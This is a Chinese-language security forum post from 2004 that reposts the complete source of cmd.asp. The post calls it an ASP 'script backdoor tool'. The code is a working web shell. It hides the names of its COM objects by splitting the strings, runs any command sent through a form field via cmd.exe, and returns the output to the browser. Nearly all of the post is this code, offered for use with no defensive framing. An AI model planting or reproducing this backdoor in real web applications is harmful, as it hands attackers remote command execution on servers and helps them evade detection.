[转载]cmd.asp脚本后门工具源文件

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6832
精华: 834
积分: 36083
阅读权限: 255
性别: 男
来自: 中国
在线时间: 604 小时
注册时间: 2004-6-25
最后登录: 2009-1-9

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-6-26 18:52 只看该作者

[转载]cmd.asp脚本后门工具源文件

信息来源：暗域网络
文章作者：不详

复制内容到剪贴板

代码:

<%@ Language=VBscript %>

<% 

Dim oscript

Dim oscriptNet 

Dim oFileSys, oFile

Dim szCMD, szTempFile



On Error Resume Next



&#39; -- create the COM objects that we will be using -- &#39; 

Set oscript = Server.CreateObject("WS"+"CRIP"+"T.SHELL")

Set oscriptNet = Server.CreateObject("WSCR"+"IPT.NET"+"WORK")

Set oFileSys = Server.CreateObject("Scr"+"iptin"+"g.FileS"+"ystemO"+"bject") 



&#39; -- check for a command that we have posted -- &#39; 

szCMD = Request.Form(".CMD") 

If (szCMD <> "") Then



&#39; -- Use a poor mans pipe ... a temp file -- &#39;

szTempFile = "C:\" & oFileSys.GetTempName( ) 

Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 

Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 



End If



%>

<HTML>

<BODY>

<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">

<input type=text name=".CMD" size=45 value="<%= szCMD %>">

<input type=submit value="Run">

</FORM>

<PRE>

<%= "\\" & oscriptNet.ComputerName & "\" & oscriptNet.UserName %>

<br>

<% 

If (IsObject(oFile)) Then

&#39; -- Read the output from our command and remove the temp file -- &#39;

On Error Resume Next

Response.Write Server.HTMLEncode(oFile.ReadAll)

oFile.Close

Call oFileSys.DeleteFile(szTempFile, True)

End If

%>

</BODY>

</HTML>

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 开源代码收集{ Software Source Code } » [转载]cmd.asp脚本后门工具源文件